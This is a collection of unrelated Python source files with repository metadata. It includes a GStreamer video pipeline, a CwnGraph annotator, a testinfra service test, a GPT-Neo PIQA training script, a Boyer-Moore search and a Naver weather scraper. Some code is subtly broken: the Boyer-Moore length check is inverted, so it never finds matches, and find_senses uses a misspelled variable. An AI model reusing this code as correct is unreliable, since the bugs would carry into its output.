else:
ret = ret and self.decoder.link(self.videoconvert)
ret = ret and self.videoconvert.link(self.appsink)
# подключаем tee к rtpQueue
teeSrcPadTemplate = self.tee.get_pad_template('src_%u')
rtpTeePad = self.tee.request_pad(teeSrcPadTemplate, None, None)
rtpQueuePad = self.rtpQueue.get_static_pad('sink')
ret = ret and (rtpTeePad.link(rtpQueuePad) == Gst.PadLinkReturn.OK)
# подключаем tee к frameQueue
frameTeePad = self.tee.request_pad(teeSrcPadTemplate, None, None)
frameQueuePad = self.frameQueue.get_static_pad('sink')
ret = ret and (frameTeePad.link(frameQueuePad) == Gst.PadLinkReturn.OK)
if not ret:
logging.critical('GST elements could not be linked')
sys.exit(1)
def setHost(self, host):
self._host = host
self.udpsink_rtpout.set_property('host', host)
self.udpsink_rtcpout.set_property('host', host)
def setPort(self, port):
self._port = port
self.udpsink_rtpout.set_property('port', port)
self.udpsink_rtcpout.set_property('port', port + 1)
self.udpsrc_rtcpin.set_property('port', port + 5)
def _newSample(self, sink): # callback функция, вызываемая при каждом приходящем кадре
if self._needFrame.is_set(): # если выставлен флаг нужен кадр
self._needFrame.clear() # сбрасываем флаг
sample = sink.emit('pull-sample')
sampleBuff = sample.get_buffer()
data = np.ndarray(
(self._scaleHeight, self._scaleWidth, 3),
buffer=sampleBuff.extract_dup(0, sampleBuff.get_size()), dtype=np.uint8)
# вызываем обработчик в качестве параметра передаем массив данных, ширина и высота кадра
# формат цвета RGB
self._onFrameCallback(data, self._scaleWidth, self._scaleHeight)
del sample
return Gst.FlowReturn.OK
def _onMessage(self, bus, message):
# print('Message: %s' % str(message.type))
t = message.type
if t == Gst.MessageType.EOS:
logging.info('Received EOS-Signal')
self.stop_pipeline()
elif t == Gst.MessageType.ERROR:
error, debug = message.parse_error()
logging.error('Received Error-Signal #%u: %s', error.code, debug)
self.null_pipeline()
# else:
# print('Message: %s' % str(t))
def play_pipeline(self):
self.pipeline.set_state(Gst.State.PLAYING)
logging.info('GST pipeline PLAYING')
logging.info('Streaming RTP on %s:%d', self._host, self._port)
def stop_pipeline(self):
self.pause_pipeline()
self.ready_pipeline()
def ready_pipeline(self):
self.pipeline.set_state(Gst.State.READY)
logging.info('GST pipeline READY')
def pause_pipeline(self):
self.pipeline.set_state(Gst.State.PAUSED)
logging.info('GST pipeline PAUSED')
def null_pipeline(self):
self.pipeline.set_state(Gst.State.NULL)
logging.info('GST pipeline NULL')
def write(self, s):
gstBuff = Gst.Buffer.new_wrapped(s)
if not (gstBuff is None):
self.appsrc.emit('push-buffer', gstBuff)
def flush(self):
self.stop_pipeline()
def frameRequest(self): # выставляем флаг запрос кадра, возвращает True, если запрос кадра удался
if not self._needFrame.is_set():
self._needFrame.set()
return True
return False
| [
"[email protected]"
] | |
92c2d34affd7b5ef8b641035988995b7157e86b1 | ecb9a783694300b2ea5f77388b2d314995680808 | /src/iter.py | 3c97589dee843e70e392c3c7af4c7b23240a0335 | [] | no_license | yaoyuanyy/python_demo | 0ee5520027d2c406e320f25a0327b7a81155bab8 | 5a50fe900e1a254a17bbb623cb2fd9f8fbdb7079 | refs/heads/master | 2021-01-17T16:08:30.412766 | 2017-02-24T06:39:59 | 2017-02-24T06:39:59 | 83,010,359 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 146 | py | import sys
list = [1, 2, 3]
it = iter(list)
print(it)
while True:
try:
print(next(it))
except StopIteration:
sys.exit()
| [
"[email protected]"
] | |
0df491aaf04bd5efd3e1d19660af119f72bb10a1 | 93a959b0458bcdb60d33a4504f483078a78a56b6 | /CwnGraph/cwn_annotator.py | 7b58fe2e65d190fd9571cc70e6a5695b91cfcc2f | [] | no_license | kylecomtw/CwnGraph | a82d763a645c3342502274e6760cb63593f23d42 | 86ddb17de548a61c57f925fb2d783467431db18b | refs/heads/master | 2021-10-24T10:00:19.913420 | 2019-03-25T04:45:36 | 2019-03-25T04:45:36 | 84,843,165 | 3 | 2 | null | null | null | null | UTF-8 | Python | false | false | 5,050 | py | import os
import json
from datetime import datetime
from . import cwnio
from . import annot_merger
from .cwn_types import *
from .cwn_graph_utils import CwnGraphUtils
class CwnAnnotator:
PREFIX = "annot/cwn_annot"
def __init__(self, cgu, session_name):
self.parent_cgu = cgu
self.name = session_name
self.V = {}
self.E = {}
self.meta = {
"session_name": session_name,
"timestamp": "",
"serial": 0,
"base_hash": cgu.get_hash()
}
self.load(session_name)
def load(self, name):
fpath = f"{CwnAnnotator.PREFIX}_{name}.json"
if os.path.exists(fpath):
print("loading saved session from ", fpath)
self.meta, self.V, self.E = \
cwnio.load_annot_json(fpath)
base_hash = self.meta.get("base_hash", "")
if base_hash and base_hash != self.parent_cgu.get_hash():
print("WARNING: loading with a different base image")
return True
else:
print("Creating new session", name)
return False
def save(self, with_timestamp=False):
name = self.meta["session_name"]
timestamp = datetime.now().strftime("%y%m%d%H%M%S")
self.meta["snapshot"] = timestamp
cwnio.ensure_dir("annot")
if with_timestamp:
cwnio.dump_annot_json(self.meta, self.V, self.E,
f"{CwnAnnotator.PREFIX}_{name}_{timestamp}.json")
else:
cwnio.dump_annot_json(self.meta, self.V, self.E,
f"{CwnAnnotator.PREFIX}_{name}.json")
def new_node_id(self):
serial = self.meta.get("serial", 0) + 1
session_name = self.meta.get("session_name", "")
self.meta["serial"] = serial
return f"{session_name}_{serial:06d}"
def create_lemma(self, lemma):
node_id = self.new_node_id()
new_lemma = CwnLemma(node_id, self)
new_lemma.lemma = lemma
self.set_lemma(new_lemma)
return new_lemma
def create_sense(self, definition):
node_id = self.new_node_id()
new_sense = CwnSense(node_id, self)
new_sense.definition = definition
self.set_sense(new_sense)
return new_sense
def create_relation(self, src_id, tgt_id, rel_type):
if not self.get_node_data(src_id):
raise ValueError(f"{src_id} not found")
if not self.get_node_data(tgt_id):
raise ValueError(f"{tgt_id} not found")
edge_id = (src_id, tgt_id)
new_rel = CwnRelation(edge_id, self)
new_rel.relation_type = rel_type
self.set_relation(new_rel)
return new_rel
def set_lemma(self, cwn_lemma):
self.V[cwn_lemma.id] = cwn_lemma.data()
def set_sense(self, cwn_sense):
self.V[cwn_sense.id] = cwn_sense.data()
def set_relation(self, cwn_relation):
self.E[cwn_relation.id] = cwn_relation.data()
def remove_lemma(self, cwn_lemma):
cwn_lemma.action = "delete"
self.set_lemma(cwn_lemma)
def remove_sense(self, cwn_sense):
cwn_sense.action = "delete"
self.set_sense(cwn_sense)
def remove_relation(self, cwn_relation):
cwn_relation.action = "delete"
self.set_relation(cwn_relation)
def find_glyph(self, instr):
return self.parent_cgu.find_glyph(instr)
def find_senses(self, lemma="", definition="", examples=""):
cgu = CwnGraphUtils(self.V, self.E)
senses = cgu.find_senses(lemma, defintion, examples)
parent_senses = self.parent_cgu.find_senses(lemma, definition, examples)
ret = annot_merger.merge(senses, parent_senses, self)
return ret
def find_lemmas(self, instr_regex):
cgu = CwnGraphUtils(self.V, self.E)
lemmas = cgu.find_lemma(instr_regex)
parent_lemmas = self.parent_cgu.find_lemma(instr_regex)
ret = annot_merger.merge(lemmas, parent_lemmas, self)
return ret
def find_edges(self, node_id, is_directed = True):
cgu = CwnGraphUtils(self.V, self.E)
edges = cgu.find_edges(node_id, is_directed)
parent_edges = self.parent_cgu.find_edges(node_id, is_directed)
ret = annot_merger.merge(edges, parent_edges, self)
return ret
def get_node_data(self, node_id):
node_data = self.V.get(node_id, {})
if not node_data:
node_data = self.parent_cgu.get_node_data(node_id)
return node_data
def get_edge_data(self, edge_id):
edge_data = self.E.get(edge_id, {})
if not edge_data:
edge_data = self.parent_cgu.get_edge_data(edge_id)
return edge_data
def connected(self, node_id, is_directed = True, maxConn=100, sense_only=True):
raise NotImplementedError("connected() is not implemented in CwnAnnotator")
| [
"[email protected]"
] | |
99c78b4857e3bb376f9341fe3607dec6bb56d5d2 | 85bfd24a172bb4b35ff373599fca4096c9c4c529 | /testinfra_tim/test_service.py | 0e7f0d3101898495b917efb0ccfa88dfcdce58d5 | [
"MIT"
] | permissive | scaleway/tim | 503a0e7726da8e97636a09e5dcaa792bbd701a48 | 6bfa6113fdd2b18b1facee47353643544457f1f4 | refs/heads/master | 2020-12-02T07:57:05.616645 | 2017-09-08T15:29:50 | 2017-09-08T15:39:15 | 96,750,851 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 2,419 | py | '''
Copyright (C) 2017 Scaleway. All rights reserved.
Use of this source code is governed by a MIT-style
license that can be found in the LICENSE file.
'''
from functools import reduce
from .tooling import yaml_params, listize, map_sum, params_warn
def _get_services(params, running=True, enabled=True):
"""
This generator yields services names and
expected states from an input tree.
"""
if isinstance(params, str):
yield (params, running, enabled)
elif isinstance(params, (list, tuple)):
for subparam in params:
yield from _get_services(subparam)
elif isinstance(params, dict):
running = params.pop('running', running)
enabled = params.pop('enabled', enabled)
get_name_attr = lambda name: listize(params.pop(name, []))
for subparam in map_sum(get_name_attr, ('name', 'names',)):
yield from _get_services(subparam, running, enabled)
params_warn(params)
else:
raise RuntimeError('service test takes a dict, list'
' or string as parameter')
@yaml_params
def test_service(host, params):
"""
Test the status of one or more services.
By default, services are required to be
enabled and running.
It is meant to be very flexible and should
accept any reasonable input.
It even features inheritance :)
You can use nested lists and dictionnaries
to list service names. The tested state of
the service is running and enabled by default.
This behavior can be changed using the
'running' and 'enabled' attributes of
dictionnarires. Child services are read
from the name and names keys.
Example:
>> - service:
>> names:
>> - running_enabled
>> - running_enabled
>> running: true
>> enabled: true
>>
>> - service:
>> - running_enabled
>> - running_enabled
>>
>> - service: running_enabled
>>
>> - service:
>> - names:
>> - stopped_disabled
>> - name: running_disabled
>> running: true
>> running: false
>> enabled: false
>> - running_enabled
"""
for name, running, enabled in _get_services(params):
service = host.service(name)
assert name and service.is_running == running
assert name and service.is_enabled == enabled
| [
"[email protected]"
] | |
bd171b67cb9363e6bad907a04d5ab5e0bc909104 | c16d80fa4837ca849056dc1e66191825037969ed | /gptneo_piqa.py | d804ccdcc15115883cf1b8dceb7408a4520b8371 | [] | no_license | vivekvkashyap/gpt2-commonsens | c289819e440b52dfb7390c614494cd85437cd1c3 | f5d884bcf27c2bd2cb3cf8fa55f6151d12e17b9d | refs/heads/main | 2023-06-25T17:37:08.203910 | 2021-07-27T05:06:33 | 2021-07-27T05:06:33 | 389,845,411 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,707 | py | import jax
print(jax.local_device_count())
import jax.numpy as jnp
import flax
import flax.linen as nn
from flax.training.common_utils import get_metrics,onehot,shard,shard_prng_key
from flax.training import train_state
from flax.metrics.tensorboard import SummaryWriter
from flax.training import checkpoints
from datasets import load_dataset,load_metric
from transformers import GPT2Tokenizer
from tqdm import tqdm
import logging
import optax
import math
from pathlib import Path
from typing import Callable
from itertools import chain
from flax.metrics import tensorboard
from datasets import load_dataset,load_metric
from transformers import GPTNeoConfig,GPT2Tokenizer
from model_file import FlaxGPTNeoForMultipleChoice
logger = logging.getLogger()
logger.setLevel(logging.INFO)
tokenizer=GPT2Tokenizer.from_pretrained('EleutherAI/gpt-neo-1.3B',pad_token='<|endoftext|>')
dataset=load_dataset('piqa')
num_choices=2
def preprocess(example):
example['first_sentence']=[example['goal']]*num_choices
example['second_sentence']=[example[f'sol{i}'] for i in [1,2]]
return example
train_dataset=dataset['train'].map(preprocess)
validation_dataset=dataset['validation'].map(preprocess)
test_dataset=dataset['test'].map(preprocess)
len_train_dataset=16113
len_validation_dataset=1838
len_test_dataset=3084
train_dataset=train_dataset.select(range(len_train_dataset))
test_dataset=test_dataset.select(range(len_test_dataset))
validation_dataset=validation_dataset.select(range(len_validation_dataset))
remove_col=train_dataset.column_names
def tokenize(examples):
tokenized_examples=tokenizer(examples['first_sentence'],examples['second_sentence'],padding='max_length',truncation=True,max_length=256,return_tensors='jax')
tokenized_examples['labels']=int(examples['label'])
return tokenized_examples
train_dataset=train_dataset.map(tokenize)
validation_dataset=validation_dataset.map(tokenize)
train_dataset=train_dataset.remove_columns(remove_col)
validation_dataset=validation_dataset.remove_columns(remove_col)
test_dataset=test_dataset.remove_columns(remove_col)
per_device_batch_size=4
seed=0
num_train_epochs=3
learning_rate=2e-5
model = FlaxGPTNeoForMultipleChoice.from_pretrained('EleutherAI/gpt-neo-1.3B',input_shape=(1,num_choices,1))
total_batch_size = per_device_batch_size * jax.local_device_count()
print('The overall batch size (both for training and eval) is', total_batch_size)
num_train_steps = len(train_dataset) // total_batch_size * num_train_epochs
num_validation_steps=len(validation_dataset)//total_batch_size*num_train_epochs
learning_rate_function = optax.linear_schedule(init_value=learning_rate, end_value=0, transition_steps=num_train_steps)
class TrainState(train_state.TrainState):
logits_function:Callable=flax.struct.field(pytree_node=False)
loss_function:Callable=flax.struct.field(pytree_node=False)
def adamw(weight_decay):
return optax.adafactor(learning_rate=learning_rate_function)
decay_path=lambda p:not any(x in p for x in ['bias','LayerNorm.weight'])
def traverse(function):
def mask(data):
flat=flax.traverse_util.flatten_dict(data)
return flax.traverse_util.unflatten_dict({k:function(k,v) for k,v in flat.items()})
return mask
gradient_transformation=optax.chain(
optax.masked(adamw(0.0),mask=traverse(lambda path,_:decay_path(path))),
optax.masked(adamw(0.01),mask=traverse(lambda path,_:not decay_path(path))))
def loss_function(logits,labels):
logits=flax.linen.log_softmax(logits)
xentropy=optax.softmax_cross_entropy(logits,onehot(labels,num_classes=num_choices))
return jnp.mean(xentropy)
def eval_function(logits):
return logits.argmax(-1)
state=TrainState.create(apply_fn=model.__call__,
params=model.params,
tx=gradient_transformation,
logits_function=eval_function,
loss_function=loss_function)
def train_step(state,batch,dropout_rng):
targets=batch.pop("labels")
dropout_rng,new_dropout_rng=jax.random.split(dropout_rng)
def loss_function(params):
logits=state.apply_fn(**batch,params=params,dropout_rng=dropout_rng,train=True)[0]
loss=state.loss_function(logits,targets)
return loss
grad_function=jax.value_and_grad(loss_function)
loss,grad=grad_function(state.params)
grad=jax.lax.pmean(grad,"batch")
new_state=state.apply_gradients(grads=grad)
#Added.
logits=new_state.apply_fn(**batch,params=new_state.params,dropout_rng=dropout_rng,train=True)[0]
accuracy=jnp.equal(jnp.argmax(logits,axis=-1),targets)
metrics=jax.lax.pmean({"loss":loss,"learning_rate":learning_rate_function(state.step),'accuracy':accuracy},axis_name="batch")
return new_state,metrics,new_dropout_rng
parallel_train_step = jax.pmap(train_step, axis_name="batch", donate_argnums=(0,))
def eval_step(state, batch):
targets=batch.pop('labels')
logits = state.apply_fn(**batch, params=state.params, train=False)
loss=state.loss_function(logits,targets)
predictions=state.logits_function(logits)
eval_accuracy=jnp.equal(predictions,targets)
#eval_acc=jnp.equal(predictions,targets)
metrics=jax.lax.pmean({"loss":loss,'accuracy':eval_accuracy},axis_name="batch")
#return state.logits_function(logits) #(8,4)
return targets,predictions,metrics
parallel_eval_step = jax.pmap(eval_step, axis_name="batch")
def glue_train_data_loader(rng,dataset,batch_size):
steps_per_epoch=len_train_dataset//batch_size
perms=jax.random.permutation(rng,len_train_dataset)
perms=perms[:steps_per_epoch*batch_size]
perms=perms.reshape((steps_per_epoch,batch_size))
for perm in perms:
batch=dataset[perm]
#print(jnp.array(batch['label']))
batch={k:jnp.array(v) for k,v in batch.items()}
batch=shard(batch)
yield batch
rng=jax.random.PRNGKey(seed)
dropout_rngs=jax.random.split(rng,jax.local_device_count())
def glue_eval_data_loader(dataset, batch_size):
for i in range(len_validation_dataset // batch_size):
batch = dataset[i * batch_size : (i + 1) * batch_size]
batch = {k: jnp.array(v) for k, v in batch.items()}
batch = shard(batch)
yield batch
state = flax.jax_utils.replicate(state)
actual_task = "mnli"
metric = load_metric('glue', "mnli")
actual_taskmetric = load_metric('glue', actual_task)
workdir='./piqa_tensorboard'
summary_writer = tensorboard.SummaryWriter(workdir)
logger.info(f"***** Running training *****")
logger.info(f" Num examples = {len_train_dataset}")
logger.info(f" Num Epochs = {num_train_epochs}")
logger.info(f" Instantaneous batch size per device = {per_device_batch_size}")
logger.info(f" Total train batch size = {total_batch_size}")
logger.info(f" Total optimization steps = {num_train_steps}")
for i, epoch in enumerate(tqdm(range(1, num_train_epochs+1), desc=f"Epoch ...", position=0, leave=True)):
rng, input_rng = jax.random.split(rng)
train_acc_metrics=[]
train_loss_metrics=[]
eval_acc_metrics=[]
eval_loss_metrics=[]
# train
with tqdm(total=len_train_dataset // total_batch_size, desc="Training...", leave=False) as progress_bar_train:
for idx,batch in enumerate(glue_train_data_loader(input_rng, train_dataset, total_batch_size)):
state, train_metric, dropout_rngs = parallel_train_step(state, batch, dropout_rngs)
train_acc_metrics.append(jax.device_get(train_metric['accuracy']).mean().item())
train_loss_metrics.append(flax.jax_utils.unreplicate(train_metric)['loss'].item())
if idx%5==0:
summary_writer.scalar('train_loss',flax.jax_utils.unreplicate(train_metric)['loss'].item(),idx)
summary_writer.scalar('train_accuracy', jax.device_get(train_metric['accuracy']).mean().item(),idx)
if idx%20==0:
logger.info(f"train_step_loss{idx}: {flax.jax_utils.unreplicate(train_metric)['loss'].item()} train_step_acc{idx}: {jax.device_get(train_metric['accuracy']).mean().item()} ")
progress_bar_train.update(1)
# evaluate
with tqdm(total=len_validation_dataset // total_batch_size, desc="Evaluating...", leave=False) as progress_bar_eval:
for idx,batch in enumerate(glue_eval_data_loader(validation_dataset, total_batch_size)):
labels,predictions,eval_metric=parallel_eval_step(state, batch)
eval_acc_metrics.append(jax.device_get(eval_metric['accuracy']).mean().item())
eval_loss_metrics.append(flax.jax_utils.unreplicate(eval_metric)['loss'].item())
progress_bar_eval.update(1)
if idx%5==0:
logger.info(f"eval_step_loss {idx} : {flax.jax_utils.unreplicate(eval_metric)['loss'].item()} eval_step_acc {idx} : {jax.device_get(eval_metric['accuracy']).mean().item()}")
summary_writer.scalar('eval_loss : ', flax.jax_utils.unreplicate(eval_metric)['loss'].item(),idx)
summary_writer.scalar('eval_accuracy : ', jax.device_get(eval_metric['accuracy']).mean().item(),idx)
logger.info(f"---------------------Epoch {epoch} done-----------------")
logger.info(f"Train loss: {jax.device_get(jnp.array(train_loss_metrics)).mean().item()} Train accuracy: {jax.device_get(jnp.array(train_acc_metrics)).mean().item()}")
logger.info(f"Eval loss: {jax.device_get(jnp.array(eval_loss_metrics)).mean().item()} Eval accuracy: {jax.device_get(jnp.array(eval_acc_metrics)).mean().item()}")
if jax.process_index() == 0:
params = jax.device_get(jax.tree_map(lambda x: x[0], state.params))
model.save_pretrained(
'./',
params=params,
push_to_hub=True,
commit_message=f"Piqa:Saving weights of epoch {epoch} at step {idx}",)
summary_writer.flush()
| [
"[email protected]"
] | |
60a6d3c470672d39fae27e61c518fbf33c37c655 | 0d2a66d7f04c11f7ac655ffeee855def9f3b406d | /setup.py | d70de94d5c6d3ccc808c1c53110d146da07a1559 | [] | no_license | lmbeccaria/python_network_tests | dd7d46850d0a440d95c36edbab78c94d3263f10a | 18b0ba47399abd2f4aa736c1bc9095d90f3c5339 | refs/heads/master | 2016-09-16T04:23:00.752284 | 2014-08-07T01:32:05 | 2014-08-07T01:32:05 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 453 | py | try:
from setuptools import setup
except ImportError:
from distutils.core import setup
config = {
'description':'Network Tests',
'author':'Luis B',
'url': 'URL to get it at.',
'download_url': 'Where to download it.',
'author_email': '[email protected]',
'version': '0.1',
'install_requires': ['nose'],
'packages': ['network_connection'],
'scripts': [],
'name': 'network_connection'
}
setup(**config)
| [
"monkeyboy@intiwasi.(none)"
] | monkeyboy@intiwasi.(none) |
57592e74791a7c3a6e0010ee1083835391f9c27f | 530ce8ce026cf0ed96184e0739fa5fd109dd0b76 | /ENotePadAlgorithm/strFind/boyerMoore.py | a115e4e07f743af7eea5f1ea3974edd50d020901 | [
"MIT"
] | permissive | xioacd99/EnhancedNotePad | 0c41eb64dc4ddb57975d521a6320414d0ed0f0fd | b95da1c4d957061ad60015f3b9ab5c445b5a1bc4 | refs/heads/main | 2023-07-13T13:47:50.804090 | 2021-08-25T15:53:55 | 2021-08-25T15:53:55 | 388,513,669 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,319 | py | import os
# import time only for performance test
import time
# 单词结尾符号/单词分隔符
wordSplit = [',', '.', ':', '"', ",", '\n', ' ', '?', '!', '(', ')',
',', '。', '‘', '‘', '“', '”', '?', '!', '(', ')']
class BoyerMoore(object):
def __init__(self):
super(BoyerMoore, self).__init__()
self.badCharTable = {}
self.goodSuffixTable = {}
def getBadCharTable(self, word):
# find positions every char
charLocations = {}
matcherLen = len(word)
for i in range(matcherLen):
currentChar = word[i]
locations = []
if currentChar in charLocations:
locations = charLocations[currentChar]
locations.append(i)
charLocations[currentChar] = locations
# build badCharTable
self.badCharTable = {}
for i in range(matcherLen, 0, -1):
for charTmp in charLocations.keys():
innerResult = {}
if charTmp in self.badCharTable:
innerResult = self.badCharTable[charTmp]
locationsTmp = charLocations[charTmp]
finded = False
for j in range(len(locationsTmp), 0, -1):
locationTmp = locationsTmp[j - 1]
if locationTmp <= i - 1:
innerResult[str(i - 1)] = locationTmp
finded = True
break
if finded == False:
innerResult[str(i - 1)] = -1
self.badCharTable[charTmp] = innerResult
def badCharOffset(self, char, pos):
if char in self.badCharTable:
innerLocationTable = self.badCharTable[char]
return pos - innerLocationTable[str(pos)]
else:
return pos + 1
def getGoodSuffixTable(self, matcher):
self.goodSuffixTable = {}
matcherLen = len(matcher)
for i in range(matcherLen, 1, -1):
tmpSuffix = matcher[i - 1: matcherLen]
tmpSuffixLen = len(tmpSuffix)
finded = False
locationTmp = matcherLen - tmpSuffixLen - 1
while True:
if locationTmp <= 0 - tmpSuffixLen:
break
matchedThisTime = True
for j in range(0, tmpSuffixLen, 1):
if locationTmp + j < 0:
continue
if tmpSuffix[j] != matcher[locationTmp + j]:
matchedThisTime = False
if matchedThisTime == True:
finded = True
break
locationTmp = locationTmp - 1
if finded == True:
self.goodSuffixTable[tmpSuffix] = i - 1 - locationTmp
else:
self.goodSuffixTable[tmpSuffix] = matcherLen
def goodSuffixOffset(self, matchedPart):
if matchedPart == None or len(matchedPart) == 0:
return 0
return self.goodSuffixTable[matchedPart]
def strFind(self, source, target, pos=0, fullWord=True, caseSensitive=True):
sLen = len(source)
tLen = len(target)
# 如果主串和子串有一方为空或子串长度小于主串则返回空
if (sLen == 0 or tLen == 0) or tLen < sLen:
return []
# 如果不区分大小写
if not caseSensitive:
source = source.lower()
target = target.lower()
idx = []
self.getBadCharTable(target)
self.getGoodSuffixTable(target)
while pos + tLen <= sLen:
isFind = True
step = tLen
matchedPart = ""
for i in range(tLen, 0, -1):
curChar = source[pos + i - 1]
currentMatcherChar = target[i - 1]
if curChar != currentMatcherChar:
offsetOfBadChar = self.badCharOffset(curChar, i - 1)
offsetOfGoodSuffix = self.goodSuffixOffset(matchedPart)
step = max(offsetOfBadChar, offsetOfGoodSuffix)
isFind = False
break
else:
matchedPart = curChar + matchedPart
if isFind:
step = 1
wordStart = pos
# 是否全字匹配
if fullWord:
wordEnd = pos
while True:
if source[wordEnd] in wordSplit:
break
else:
wordEnd += 1
if wordEnd - wordStart == len(target):
idx.append(wordStart)
else:
idx.append(wordStart)
pos += step
return idx
def fileFind(self, filename, target):
results = []
if os.path.exists(filename):
lineNum = 1
with open(filename, 'r', encoding='utf-8') as file:
line = file.readline()
while line:
idx = self.strFind(line, target)
if idx:
for pos in idx:
results.append([lineNum, pos])
# 算法测试输入语句
'''
singleResult = 'The ' + target + ' occurs ' + str(len(idx)) + ' times in line ' + str(
lineNum) + ', which positions are '
for pos in idx:
singleResult += '(' + str(lineNum) + ', ' + str(pos) + ') '
results.append(singleResult)
'''
line = file.readline()
lineNum += 1
else:
with open(filename, 'w', encoding='uft-8') as file:
print('Create a new file named %s' % filename)
return results
if __name__ == '__main__':
start = time.time()
# write your test code
test = BoyerMoore()
ans = test.fileFind(
'F:\\.vscode\\Github\\EnhancedNotePad\\ENotePadAlgorithm\\algorithmTestData\\BigTest.txt', 'be')
# end
end = time.time()
print('using time: %s seconds' % (end - start))
| [
"[email protected]"
] | |
4716976f68bf061fef859306dd4192440aa5d090 | 94312b972c9ea96404535d26a297c72e75f84d22 | /Weather_WebCrawl.py | 350443ebd66136fe19578ad51278528825577cdc | [] | no_license | 1LuvCode/My_Slut_TJ | 2e8092d78857497a45a22d4af2270dc4c51cdada | d7f39542cccb51b46d4d53d6489ef3b82079bc4d | refs/heads/main | 2023-02-25T20:16:32.461565 | 2021-02-02T11:28:37 | 2021-02-02T11:28:37 | 335,256,950 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,695 | py | import requests
from bs4 import BeautifulSoup
def Crawling_Weather(Finallocation):
url = 'https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=1&ie=utf8&query=' + Finallocation
hdr = {'User-Agent': (
'mozilla/5.0 (windows nt 10.0; win64; x64) applewebkit/537.36 (khtml, like gecko) chrome/78.0.3904.70 safari/537.36')}
req = requests.get(url, headers=hdr)
html = req.text
soup = BeautifulSoup(html, 'html.parser')
LocationInfo = ""
NowTemp = ""
CheckDust = []
# 오류 체크
ErrorCheck = soup.find('span', {'class': 'btn_select'})
if 'None' in str(ErrorCheck):
print("Error! 지역 검색 오류!")
return None
else:
# 지역 정보
for i in soup.select('span[class=btn_select]'):
LocationInfo = i.text
# 현재 온도
NowTemp = soup.find('span', {'class': 'todaytemp'}).text + soup.find('span', {'class': 'tempmark'}).text[2:]
# 날씨 캐스트
WeatherCast = soup.find('p', {'class': 'cast_txt'}).text
# 오늘 오전온도, 오후온도, 체감온도
TodayMorningTemp = soup.find('span', {'class': 'min'}).text
TodayAfternoonTemp = soup.find('span', {'class': 'max'}).text
TodayFeelTemp = soup.find('span', {'class': 'sensible'}).text[5:]
# 자외선 지수
TodayUV = soup.find('span', {'class': 'indicator'}).text[4:-2] + " " + soup.find('span',
{'class': 'indicator'}).text[-2:]
# 미세먼지, 초미세먼지, 오존 지수
CheckDust1 = soup.find('div', {'class': 'sub_info'})
CheckDust2 = CheckDust1.find('div', {'class': 'detail_box'})
for i in CheckDust2.select('dd'):
CheckDust.append(i.text)
FineDust = CheckDust[0][:-2] + " " + CheckDust[0][-2:]
UltraFineDust = CheckDust[1][:-2] + " " + CheckDust[1][-2:]
Ozon = CheckDust[2][:-2] + " " + CheckDust[2][-2:]
# 내일 오전, 오후 온도 및 상태 체크
tomorrowArea = soup.find('div', {'class': 'tomorrow_area'})
tomorrowCheck = tomorrowArea.find_all('div', {'class': 'main_info morning_box'})
# 내일 오전온도
tomorrowMoring1 = tomorrowCheck[0].find('span', {'class': 'todaytemp'}).text
tomorrowMoring2 = tomorrowCheck[0].find('span', {'class': 'tempmark'}).text[2:]
tomorrowMoring = tomorrowMoring1 + tomorrowMoring2
# 내일 오전상태
tomorrowMState1 = tomorrowCheck[0].find('div', {'class': 'info_data'})
tomorrowMState2 = tomorrowMState1.find('ul', {'class': 'info_list'})
tomorrowMState3 = tomorrowMState2.find('p', {'class': 'cast_txt'}).text
tomorrowMState4 = tomorrowMState2.find('div', {'class': 'detail_box'})
tomorrowMState5 = tomorrowMState4.find('span').text.strip()
tomorrowMState = tomorrowMState3 + " " + tomorrowMState5
# 내일 오후온도
tomorrowAfter1 = tomorrowCheck[1].find('p', {'class': 'info_temperature'})
tomorrowAfter2 = tomorrowAfter1.find('span', {'class': 'todaytemp'}).text
tomorrowAfter3 = tomorrowAfter1.find('span', {'class': 'tempmark'}).text[2:]
tomorrowAfter = tomorrowAfter2 + tomorrowAfter3
# 내일 오후상태
tomorrowAState1 = tomorrowCheck[1].find('div', {'class': 'info_data'})
tomorrowAState2 = tomorrowAState1.find('ul', {'class': 'info_list'})
tomorrowAState3 = tomorrowAState2.find('p', {'class': 'cast_txt'}).text
tomorrowAState4 = tomorrowAState2.find('div', {'class': 'detail_box'})
tomorrowAState5 = tomorrowAState4.find('span').text.strip()
tomorrowAState = tomorrowAState3 + " " + tomorrowAState5
Weather_info_dict = {
'지역':LocationInfo,
'현재온도':NowTemp,
'체감온도':TodayFeelTemp,
'오전온도':TodayMorningTemp,
'오후온도':TodayAfternoonTemp,
'현재상태':WeatherCast,
'현재자외선지수':TodayUV,
'현재미세먼지농도':FineDust,
'현재초미세먼지농도':UltraFineDust,
'현재오존지수':Ozon,
'내일오전온도':tomorrowMoring,
'내일오전상태':tomorrowMState,
'내일오후온도':tomorrowAfter,
'내일오후상태':tomorrowAState
}
return Weather_info_dict
# print("=========================================")
# print(LocationInfo + " 날씨 정보입니다.")
# print("=========================================")
# print("현재온도: " + NowTemp)
# print("체감온도: " + TodayFeelTemp)
# print("오전/오후 온도: " + TodayMorningTemp + "/" + TodayAfternoonTemp)
# print("현재 상태: " + WeatherCast)
# print("현재 자외선 지수: " + TodayUV)
# print("현재 미세먼지 농도: " + FineDust)
# print("현재 초미세먼지 농도: " + UltraFineDust)
# print("현재 오존 지수: " + Ozon)
# print("=========================================")
# print(LocationInfo + " 내일 날씨 정보입니다.")
# print("=========================================")
# print("내일 오전 온도: " + tomorrowMoring)
# print("내일 오전 상태: " + tomorrowMState)
# print("내일 오후 온도: " + tomorrowAfter)
# print("내일 오후 상태: " + tomorrowAState)
| [
"[email protected]"
] | |
707062ffa62600fed5892717cfc5efb6677b3277 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_plough.py | 8524ffbb0f26cf406e78e16dbed5ed7ccee77fc1 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 427 | py |
